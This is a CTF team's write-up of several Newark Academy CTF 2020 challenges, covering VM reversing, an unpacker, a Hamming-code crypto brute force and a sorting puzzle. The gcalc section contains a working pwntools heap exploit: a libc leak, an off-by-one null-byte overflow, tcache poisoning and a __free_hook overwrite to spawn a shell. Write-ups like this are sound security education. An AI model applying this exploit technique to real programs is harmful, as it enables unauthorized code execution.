# Newark Academy CTF 2020
b1c takes third global and first in highschools (We stole Gabe for one algo challenge *again*).
We also maintained the b1c tradition of dropping from 1st to 3rd due to a single challenge (*ahem* veggie factory 5 *ahem*) :upside_down_face:
## gfc3
> Rev 1000, 19 solves
> Someone at Flag Checker Industries™ had too much time on their hands and gave you... this. It says vm in there... good luck.
>
> -asphyxia
Wow gee I really wonder if this is a vm challenge. Opening the file in Binary Ninja and looking at `_start`, we see the following:

Wow with all these symbols that have `vm` in their name there's no way it could be a vm challenge right?
`vm_init` has the following dissasembly:

It mostly seems to zero out some memory (using super fast SIMD because you don't want zeroing out 64 bytes to be slow, do you) but it sets the dword at offset 8 to 0x202 and the one at offset 0 to `edx`, which is 0. Then, in the `vm_step` function:

(you may want to open the image in a new tab and zoom in)
Okay so I'm starting to feel that maybe this is actually a vm challenge. Go figure. We should start by looking at the first two functions:


(the entire switch is too chonky to fit)
Basically, the first function is for loading in numbers. Every instruction is at least 2 bytes. If the MSB of byte 1 is set, then the most significant nibble (MSN) of byte 2 is used to determine the size of the value. 0 means a byte is pulled from after the instruction, 1 means 2 bytes, and 2 means 4 bytes. If the MSB isn't set, then the value is pulled from the MSN of byte 2.
The second function is for conditionals, pulling from the least significant nibble (LSN) of byte 2. 0 means always true, 1 means ZF is set, 2 means ZF is unset, 3 means CF is set, 4 means CF is unset, and more.
Then, there's a lot of complicated logic that involves an ALU and IO and reading from/writing to memory that I'm too lazy to explain, but here's the disassembly script (I copied the vm data into a file called `vm`):
```python=
data = open("./vm", "rb").read()
conditionals = ["", "ZF", "!ZF", "CF", "!CF", "!0 && !6", "0 || 6", "7 ^ 11", "7 == 1", "!6 && 7 == 11", "6 || 7 ^ 11"]
def addr(x):
return hex(x)[2:].rjust(4, "0")
def lit(x):
return hex(x)[2:]
def cond(x):
return x.ljust(3, " ")
sizes = ["byte ", "word ", "dword"]
cur = 0
while cur < len(data) - 1:
byte1 = data[cur]
byte2 = data[cur + 1]
b1_msb = byte1 >> 7
b1_n2 = (byte1 >> 4) & 3
b1_lsbs = byte1 & 0xf
b2_msbs = byte2 >> 4
b2_lsbs = byte2 & 0xf
extra = 0
if not b1_msb:
val = b2_msbs
else:
if b2_msbs == 3:
print(" -- invalid -- ")
cur += 2
continue
if b2_msbs < 3:
extra = 2 ** b2_msbs
val = int.from_bytes(data[cur + 2:cur + 2 + extra], "little")
else:
val = 0
if b1_lsbs > 10:
print(" -- invalid -- ")
cur += 2
continue
conditional = conditionals[b1_lsbs]
func = ""
if not b1_msb:
if b2_msbs == 4:
passon = "mem[r3]"
elif b2_msbs == 5:
passon = "input()"
else:
passon = f"r{b2_msbs}"
else:
passon = lit(val)
if b2_lsbs == 1:
op = ""
if passon == "0":
op = "+"
elif passon == "1":
op = "-"
elif passon == "2":
op = "&"
elif passon == "3":
op = "|"
elif passon == "4":
op = "^"
if op:
func = f"r1 = r8 {op} r9; r2 = FLAGS"
else:
func = f"alu({passon})"
elif b2_lsbs == 4:
if b1_n2 >= 3:
print(" -- invalid -- ")
cur += 2
continue
func = f"mem[r3] = ({sizes[b1_n2]}) {passon}"
elif b2_lsbs == 5:
func = f"print({passon})"
else:
if b1_n2 >= 3:
print(" -- invalid -- ")
cur += 2
continue
func = f"r{b2_lsbs} = ({sizes[b1_n2]}) {passon}"
if b1_msb and b2_msbs == 4:
func = "exit"
print(f"{addr(cur)} :: {cond(conditional)} ? {func}")
cur += 2 + extra
```
Which generates the following disassembly:
```
0000 :: ? r3 = (dword) 188
0006 :: ? r10 = (dword) dc8f7255
000c :: ? r8 = (dword) mem[r3]
000e :: ? r9 = (dword) r10
0010 :: ? r1 = r8 ^ r9; r2 = FLAGS
0013 :: ? mem[r3] = (dword) r1
0015 :: ? r8 = (dword) r3
0017 :: ? r9 = (dword) 4
001a :: ? r1 = r8 + r9; r2 = FLAGS
001d :: ? r3 = (dword) r1
001f :: ? r8 = (dword) r3
0021 :: ? r9 = (dword) 1c8
0027 :: ? r1 = r8 - r9; r2 = FLAGS
002a :: CF ? r0 = (dword) c
0030 :: ? r10 = (dword) 134
0036 :: ? r15 = (dword) 42
003c :: ? r0 = (dword) 107
0042 :: ? r11 = (dword) input()
0044 :: ? r8 = (dword) input()
0046 :: ? r8 = (dword) r11
0048 :: ? r9 = (dword) 43
004b :: ? r1 = r8 ^ r9; r2 = FLAGS
004e :: ? r14 = (dword) r1
0050 :: ? r10 = (dword) 14e
0056 :: ? r15 = (dword) 62
005c :: ? r0 = (dword) 107
0062 :: ? r12 = (dword) 1c8
0068 :: ? r3 = (dword) r12
006a :: ? mem[r3] = (byte ) input()
006c :: ? r8 = (dword) r12
006e :: ? r9 = (dword) 1
0071 :: ? r1 = r8 + r9; r2 = FLAGS
0074 :: ? r12 = (dword) r1
0076 :: ? r8 = (dword) r12
0078 :: ? r9 = (dword) 208
007e :: ? r1 = r8 - r9; r2 = FLAGS
0081 :: CF ? r0 = (dword) 68
0087 :: ? r12 = (dword) 1c8
008d :: ? r13 = (dword) 0
0093 :: ? r6 = (dword) 0
0096 :: ? r7 = (dword) 0
0099 :: ? r3 = (dword) r12
009b :: ? r6 = (byte ) mem[r3]
009d :: ? r8 = (dword) 188
00a3 :: ? r9 = (dword) r13
00a5 :: ? r1 = r8 + r9; r2 = FLAGS
00a8 :: ? r3 = (dword) r1
00aa :: ? r7 = (byte ) mem[r3]
00ac :: ? r8 = (dword) r6
00ae :: ? r9 = (dword) r7
00b0 :: ? r1 = r8 ^ r9; r2 = FLAGS
00b3 :: ? r8 = (dword) r1
00b5 :: !ZF ? r14 = (dword) 1
00b8 :: ? r8 = (dword) r12
00ba :: ? r9 = (dword) 1
00bd :: ? r1 = r8 + r9; r2 = FLAGS
00c0 :: ? r12 = (dword) r1
00c2 :: ? r8 = (dword) r13
00c4 :: ? r9 = (dword) r11
00c6 :: ? r1 = r8 + r9; r2 = FLAGS
00c9 :: ? r8 = (dword) r1
00cb :: ? r9 = (dword) 3f
00ce :: ? r1 = r8 & r9; r2 = FLAGS
00d1 :: ? r13 = (dword) r1
00d3 :: ? r8 = (dword) r12
00d5 :: ? r9 = (dword) 208
00db :: ? r1 = r8 - r9; r2 = FLAGS
00de :: CF ? r0 = (dword) 99
00e4 :: ? r8 = (dword) input()
00e6 :: ? r8 = (dword) r14
00e8 :: ? r9 = (dword) r14
00ea :: ? r1 = r8 & r9; r2 = FLAGS
00ed :: ZF ? r10 = (dword) 16f
00f3 :: !ZF ? r10 = (dword) 160
00f9 :: ? r15 = (dword) 105
00ff :: ? r0 = (dword) 107
0105 :: ? exit
0107 :: ? r8 = (dword) 0
010a :: ? r3 = (dword) r10
010c :: ? r9 = (dword) 0
010f :: ? r8 = (dword) 0
0112 :: ? r8 = (byte ) mem[r3]
0114 :: ? r1 = r8 - r9; r2 = FLAGS
0117 :: !ZF ? print(r8)
0119 :: !ZF ? r0 = (dword) 121
011f :: ? r0 = (dword) r15
0121 :: ? r8 = (dword) r3
0123 :: ? r9 = (dword) 1
0126 :: ? r1 = r8 + r9; r2 = FLAGS
0129 :: ? r3 = (dword) r1
012b :: ? r0 = (dword) 10c
(trimming irrelevant stuff)
```
It's clear that the stuff after address 012b is a string or something that isn't actually run, since it's unreachable and generates a lot of invalid disassembly. At the start of the disassembly, you can see that it's xorring dwords starting from 188 and ending at 1c8 with the value 0xdc8f7255. So, we can write a Haskell script to do this xor:
```haskell=
import Data.Bits
unpack :: Int -> Int -> String
unpack 0 _ = ""
unpack n x = toEnum (x .&. 0xff):unpack (n - 1) (x `shiftR` 8)
unpack32 :: Int -> String
unpack32 = unpack 4
ledata :: [Int]
ledata =
[ 0xbdbe463b, 0xb0ec1539, 0xeff60632, 0xa7fd2d33
, 0xb2fb4165, 0x83ea1a31, 0x83f92d66, 0xb2fb1f64
, 0xedfc000a, 0xb2fc0661, 0xa9fc2d27, 0xefec0221
, 0xaeec0665, 0xecfb1a64, 0xede12d3b, 0xaeec0f21
]
main :: IO ()
main = putStrLn $ ledata >>= unpack32 . (`xor` 0xdc8f7255)
```
This prints out `n41algclgty3f_r{03tndhe_3_v_1mtn_rs14tsnr_sutpc30tcr1ht0n_n1t}cr`. We could rev the rest of the vm, but it's clear that this is just one of those "take every nth byte in a cycle" things, so we can modify our haskell script to do that:
```haskell=
import Data.Bits
import Data.List
chunksOf :: Int -> [a] -> [[a]]
chunksOf _ [] = []
chunksOf n l = if length l < n then [l] else take n l:chunksOf n (drop n l)
unpack :: Int -> Int -> String
unpack 0 _ = ""
unpack n x = toEnum (x .&. 0xff):unpack (n - 1) (x `shiftR` 8)
unpack32 :: Int -> String
unpack32 = unpack 4
ledata :: [Int]
ledata =
[ 0xbdbe463b, 0xb0ec1539, 0xeff60632, 0xa7fd2d33
, 0xb2fb4165, 0x83ea1a31, 0x83f92d66, 0xb2fb1f64
, 0xedfc000a, 0xb2fc0661, 0xa9fc2d27, 0xefec0221
, 0xaeec0665, 0xecfb1a64, 0xede12d3b, 0xaeec0f21
]
wonky :: String
wonky = ledata >>= unpack32 . (`xor` 0xdc8f7255)
swap2 :: [a] -> [a]
swap2 (a:b:c:xs) = (a:c:b:xs)
swap2 x = x
main :: IO ()
main = putStrLn $ concat . transpose . map swap2 . chunksOf 3 $ wonky
```
This prints the flag:
`nactf{th3_tr4nsp0rt_tr1gg3r3d_vm_1s_t3chn1c4lly_0ne_1nstruct10n}`
## packed
> Rev 600, 42 solves
> Binaries too large? No worries, we'll use compression to fit your massive 4KB Unicode art!
>
> -asphyxia
We can start by opening the file and looking at the main function in Binary Ninja.

At the end, there's a `jmp rcx` so you already know it's self-modifying and all the preceding code is irrelevant and not worth looking at. So, we hop into gdb, break on the jump, find rcx, then generate a core file:
```
$ gdb packed
Reading symbols from packed...
(No debugging symbols found in packed)
(gdb) b * 0x5555555550f6
Breakpoint 1 at 0x5555555550f6
(gdb) run
Starting program: /home/aplet123/ctf/nactf/packed
Breakpoint 1, 0x00005555555550f6 in ?? ()
(gdb) p/x $rcx
$1 = 0x7ffff7fc5000
(gdb) gcore dump.core
warning: Memory read failed for corefile section, 4096 bytes at 0xffffffffff600000.
Saved corefile dump.core
```
Now, we can open the core file in Binary Ninja and look at the address in `rcx`:

This seems to copy some data from one place to another, then jump to another function:

There are anti-angr measures, which I approve of, since angr is small pp. It seems to read our 65 bytes as input, but it requires a newline at the end, so our input is basically only 64 bytes. Then, it calls two functions that determine if our input is valid or not. The first of the two functions only seems to do some xors:

But the second appears to actually do some checking:

It reads in a byte from the previous data, then xors it with a byte from the input. It then increments the pointer to the data by 5. Note that `eax` should be 0 when the function returns, which means `r8d` should be 0. This means that the `or r8d, edx` should never change `r8d`, which means `edx` should be 0, which means that the input byte xorred with the data byte should be 0, which means that the two bytes must be equivalent. Since I am a bum, we're going to generate yet another core file:
```
$ gdb packed
Reading symbols from packed...
(No debugging symbols found in packed)
(gdb) b * 0x5555555550f6
Breakpoint 1 at 0x5555555550f6
(gdb) run
Starting program: /home/aplet123/ctf/nactf/packed
Breakpoint 1, 0x00005555555550f6 in ?? ()
(gdb) p/x $rcx
$1 = 0x7ffff7fc5000
(gdb) b * 0x7ffff7fc50a0
Breakpoint 2 at 0x7ffff7fc50a0
(gdb) c
Continuing.
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⢿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠿⣿⣿⣿⣿⠿⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⣿⣿⣿⣿⠀⠀⠀⠀⣿⣿⣿⣿⢿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⢿⣿⣿⣿⣿⣧⣿⣿⣿⣿⠀⠀⠀⣼⣿⣿⣿⡇⠀⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⠀⠹⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣸⣿⣿⣿⣿⡀⠀⠈⣿⣿⣿⣿⣿⣿⣿⠀⢀⣿⣿⣿⣿⣿⣀⢀⣸⣿⣿⣿⣿⣿⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⡇⠀⠀⠀⣿⣿⣿⣿⣿⣿⠀⢸⣿⣿⣿⣿⣿⣿⢸⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣆⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⠀⠀⣿⣿⣿⣿⠀⠀⠀⠀⢸⣿⣿⣿⡇⠀⠀⠀⠀⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⡇⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⡇⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⠀⠀⣿⣿⣿⣿⠀⠀⠀⠀⢸⣿⣿⣿⡇⠀⠀⠀⠀⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⢸⣿⣿⣿⡇⠀⠀⠀⠀⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⠟⠀⠀⠀⠀⢸⣿⣿⣿⡇⠀⠀⠀⠀⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
What's the flag?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, 0x00007ffff7fc50a0 in ?? ()
(gdb) gcore dump2.core
warning: Memory read failed for corefile section, 4096 bytes at 0xffffffffff600000.
Saved corefile dump2.core
```
Opening this corefile in Binary Ninja, we can extract the data and write a simple Haskell script to get every fifth byte from the data.

```haskell
ledata :: String
ledata = "RnV&Bba_TG^cNk<at2E2-fpAe{{n3H-s~*xK3]h-NlXIorf;g^Y_cB(gu\",}Tn{vq!po`K@4~J{)c9i=?k3fZ,1+Ib_n.GgFg{0gK_f;ngblEY,1mRIjn?F89_8%oudB]),1w14%d+zfxnS{dDtc?<w_lVkD3Z`usvzN+J3o/_lnqK9@_#~C/s{=P64KW(-v3z=&3jren_x*$04r9njn0S,Py/%n#_98|0s^;~(pw#fW4p-B)c=*sG3MX8(_a\\&ms-zS:mBN~]hi6zw_;(w5m5LdAV0mYv47\"]xEUibHUtNRuYA4hya\"[+Ke&fD2}?^N"
main :: IO ()
main = putStrLn $ map (ledata !!) [1, 6 .. length ledata
```
This gets us the flag:
`nactf{s3lf_unp4ck1ng_b1n_d1dnt_3v3n_s4v3_4ny_sp4c3_smh_mV4EUYae}`
## gcalc
> Pwn 700, 23 solves
> Weighted averaging is too hard, so I made a program to do it for you!
>
> nc challenges.ctfd.io 30253
>
> -asphyxia
This solution takes approx. 2 minutes and 30 seconds to run on remote lol.
We are given three important functions:
1) Add a category
2) Set grades in a category
3) Print report
Each grade category is implemented as a struct.
There is a global array of category entry structs, which is below:

There is enough space in the global category array for 16 structs.
#### Add category

We can see that we can malloc as large a chunk for grades as we want, provided that the size is nonzero. The decompilation spasm at the end is useless, and we can ignore that.
The chunk that we allocate will be set as the chunk_ptr of the next available category struct within the category array.
#### Set grades

Here, we can set grades in each category. Each byte in a category's chunk_ptr chunk is a "grade".
We are given the choice to resize a chunk before adding grades. Note that if read_int() returns a 0, then nothing happens. However, any other number will trigger a call to free the current chunk referenced by the selected category. Then, a new call to malloc is made with the requsted size.
Finally, note line 35, which contains an off by one error. In select cases, we can write into the lowest byte of the size of the next chunk. More on this later.
#### Print report
This function calculates your final percent grade.
I'm not going to show the decomp for this one because it hurts my head to look at it, and is essentially useless.
The only important function it serves is that it allows us to view each byte of each chunk as a signed integer (a "grade") as part of its functionality.
#### Libc Leak
We can leak libc fairly trivially. We can:
1. Create a 0x420 sized chunk to go into the unsorted bin
2. Create a 0x10 sized chunk to prevent top consolidation
3. Set the grade to something different to cause a free() on the unsorted bin chunk
4. Create a chunk
5. Print report
This creates a chunk to go into the unsorted bin, frees it, allocates from it, and then directly reads it.
Because of how the unsorted bin works, libc pointers are written to the first few bytes of chunks (the `fwd` and `bk` fields) in the unsorted bin, and aren't zeroed when allocated. We can abuse this to leak libc on the uninitialized chunk that we allocate.
#### Arbitrary Write
Recall the off by one in the set grades function. Can we abuse this? Yes!
If we allocate an n sized chunk, we can write n+1 bytes. However, this usually wouldn't be helpful since the next chunk is further from the end of our write, right? Nooooo.
If we create a chunk size divisible by 8 but not 10, such as 0xf8, we can write into the lowest byte of the next chunk.
Using this, you'd think that I would go and change the size of the next chunk to be very large and do stuff from there. Instead, I'm lazy and just decided to use a null byte like in picoCTF 2019's Ghost Diary.
We:
- Allocate 7 0xf0 chunks (these will be used to fill tcache later so we can get an unsorted chunk later)
- Allocate a 0xf0 chunk (Call this chunk A)
- Allocate a 0x18 chunk (Call this chunk B)
- Allocate a 0xf0 chunk (Call this chunk C)
- Free all 7 of our first 7 0xf0 chunks using the set_grades function to fill the 0x100 tcache
The last step will put 7 chunks into the 0x100 tcache (0xf0 + 0x10 bytes metadata).
Because of the malloc at the end of the set_grades function, we don't need to malloc a little chunk after chunk C to prevent top conslidation.
Then, we do the following corruption:
- Free chunk A
- Write to chunk B, forge a chunk, and overflow into chunk C's `size` parameter with a null byte
- Free chunk C
- Free chunk B
Chunk A gets added to the unsorted bin list because the 0x100 tcache is already filled.
Chunk B needs a certain 0x120 size written to the `prev_size` field of chunk C (Chunk A's 0x100 + Chunk B's 0x20)
Chunk C is freed, causing backwards consolidation with what malloc thinks is just chunk A, but is really chunk A + B.
Finally, chunk B is freed, putting it onto the tcache and setting us up for tcache poisoning.
After that, all we have to do is allocate a chunk from chunk A + B to overwrite the `fwd` pointer of the free B chunk.
We can overwrite `fwd` with `__libc_free_hook`, write `system` to it, and free a chunk that has `/bin/sh` written to it.
```python=
from pwn import *
e = ELF("./gcalc")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
context.binary = e
context.terminal = ["konsole", "-e"]
p = process([e.path])
p = remote("challenges.ctfd.io", 30253)
context.log_level="debug"
gdb.attach(p, """c""")
def add_cat(weight, amt):
p.sendlineafter(">", "1")
p.sendlineafter(")", str(weight))
p.sendlineafter("?", str(amt))
def set_grades(cat, sz, grades):
p.sendlineafter(">", "2")
p.sendlineafter(")", str(cat))
p.sendlineafter("):", str(sz))
for i in grades:
p.sendlineafter(":", str(i))
def generate():
p.sendlineafter(">", "3")
add_cat(100, 1056) #1
add_cat(100, 20) #2
set_grades(1, 1, [1, 1])
add_cat(100, 6) #3
generate()
p.recvuntil("#3:")
p.recvuntil("Grades: ")
# truly get into the Python spirit
libc.address = u64(''.join(map(lambda x: chr(int(x)) if int(x) >= 0 else chr(int(x)+256), p.recvline().strip().split(", "))).ljust(8, "\x00")) - 4111520 # make sure to calculate two's complement if negative
print("libc address", hex(libc.address))
add_cat(100, 0x3d0) #4
for i in range(7):
add_cat(100, 0xf0) #5, 6, 7, 8, 9, 10, 11
add_cat(100, 0xf0) #12
add_cat(100, 0x18) #13
add_cat(100, 0xf0) #14
for i in range(7):
set_grades(i+5, 0x80, [1 for i in range(0x81)])
set_grades(12, 0x500, [1 for i in range(0x501)])
set_grades(13, 'n', [0x41 for i in range(0x10)] + [0x20, 0x1] + [0x0 for i in range(6)] + [0])
set_grades(14, 0x500, [1 for i in range(0x501)])
#set_grades(13, 'n', [0x1 for i in range(0x19)])
set_grades(13, 0x30, [0x1 for i in range(0x31)])
forge = ""
forge += '\x00'*0xb0
forge += p64(0) + p64(0x69)
forge += p64(libc.sym["__free_hook"])
set_grades(1, 0x170, [ord(i) for i in forge] + [0 for i in range(0x171 - len(forge))])
set_grades(5, 0x10, [1 for i in range(0x11)])
set_grades(6, 0x10, [1 for i in range(0x11)])
set_grades(7, 0x10, [ord(i) for i in p64(libc.sym["system"])] + [0 for i in range(9)])
set_grades(8, 0x10, [ord(i) for i in p64(0x68732f6e69622f)] + [0 for i in range(9)])
p.sendlineafter(">", "2")
p.sendlineafter(")", "8")
p.sendlineafter("):", "32")
p.interactive()
```
Flag: `nactf{0n3_byt3_ch40s_l34d5_t0_h34p_c3rn4g3_PP0SvwNV44uwRSbm}`
## error 2
> Crypto 550, 53 solves
> Kayla decided she wants to use the previous error detection scheme for cryptography! After computing the normal error bits, she switched them around according to a secret key.
>
> Note: enc.txt has been reuploaded. Please redownload the file if you downloaded before 12:00 am 10/31
>
> -izhang05
This is a (15,11) Hamming code where the positions of the parity bits are randomized. Luckily, there are not too many posibilities for the locations of the parity bits, so we can just bruteforce them all. Script below:
```python=
from itertools import permutations
from functools import reduce
a = input()
a = [[*map(int,a[i:i+15])] for i in range(0,len(a),15)]
for pos in permutations(range(15),4):
flag = ''
for i in a:
m = i[:]
bits = {}
for j in sorted(pos)[::-1]: bits[j] = m.pop(j)
for j in range(4): m.insert(2**j-1,bits[pos[j]])
parity = reduce(lambda a, b: a ^ b, [j + 1 for j, bit in enumerate(m) if bit])
parity = list(str(format(parity, "04b")))[::-1]
n = 0
for j in range(4):
if parity[j]=='1': n+=2**j
m[n-1] ^= 1
for j in [3,2,1,0]: m.pop(2**j-1)
flag += ''.join(map(str,m))
flag = int(flag,2).to_bytes(len(flag)//8,'big')
if flag.startswith(b'nactf{'): print(flag)
```
We run this script and get the flag: `nactf{err0r_c0rr3cti0n_w1th_th3_c0rr3ct_f1le_q73xer7k9}`
## veggie factory 5
> General skills 500, 7 solves
> This is it. The last stand. Dr. J installed Turnipinator-2000 alongside Turnipinator-1000 to double his vegetable factory's productivity! Turnipinator-1000 can still swap elements x and y, while Turnipinator-2000 can swap elements w and z.
>
> nc challenges.ctfd.io 30267
>
> Same instructions as in part #3. Enter letters separated by spaces to sort Dr. J's vegetables. Entering "c" will activate the conveyor belt and shift all vegetables left one position. Entering "a" will swap the vegetable in position x with the vegetable in position y. Entering "b" will swap the vegetable in position w with the vegetable in position z. (x, y, w, and z will be given.)
>
> Wait... shouldn't this be easier than part #4?
>
> The20thDuck
Our first task will be to solve the problem using as many operations as we want (we will later optimize it). By using "c" in conjunction with "a" and "b", we have the power to switch any two elements that are 35 apart or 88 apart (I will call these 35-swaps and 88-swaps). Notice that if we were missing one of these swapping powers (for example, if we couldn't use "b"), the problem would be impossible because neither 88 nor 35 are relatively prime with 200. If you're confused about this, try sorting a list of size 10 by only 4-swaps -- its impossible (you will never be able to change the parity of any element). On the other hand, if we somehow had the power to $k$-swap for some $k$ relatively prime with 200, we could easily sort the list (see veggie factory 4).
We can simulate swapping two elements which are 53 apart (note that 53 is relatively prime with 200). How? Well consider the result of the following sequence 35- and 88-swaps (which we already know we can do):
```
swap(0, 88) #Swaps element in position 0 and 88
swap(0, 35)
swap(0, 88)
```
The result is effectively the same as swapping element 35 and 88. By rotating the conveyor belt appropriately, we can use these three swaps to simulate a 53-swap. Now, we can just sort the list using this simulated 53-swap in the same way as veggie factory 4 (reorder the list so that position $j$ is after position $i$ iff $j \equiv i+53\ (\text{mod }200)$, then bubble sort).
If you implement this solution, you end up needing around 5 million operations to sort a random list. Bubble sort takes $O(n^2)$ swaps (40000 in this case), and each swap can take up to 600 "c" moves (moving the pointer to the correct position three different times), which ends up running too slowly on the server, even after you remove chunks of 200 "c"s in a row. It turns out we need to reduce our solution to around 250000 moves. How do we do this?
Other teams may have optimized this in different ways, but the way we did it was by parallizing multipe swaps at the same time. Notice that its very expensive to do each swap because we need to use a bunch of "c" moves to get the pointer in the right place. We make this better by using each set of 600 "c" moves to complete multiple swaps. We need to be a bit careful about this: we don't want swaps that we're doing in the same set of 600 "c"s to interfere with eachother, so we keep track of which indices are being modified and only add swaps that don't touch previous swaps. This parallelization ends up reducing the number of inversions in the permutation by a large number (probably around 25) for each set of 600 "c"s, instead of just reducing the number of inversions by 1.
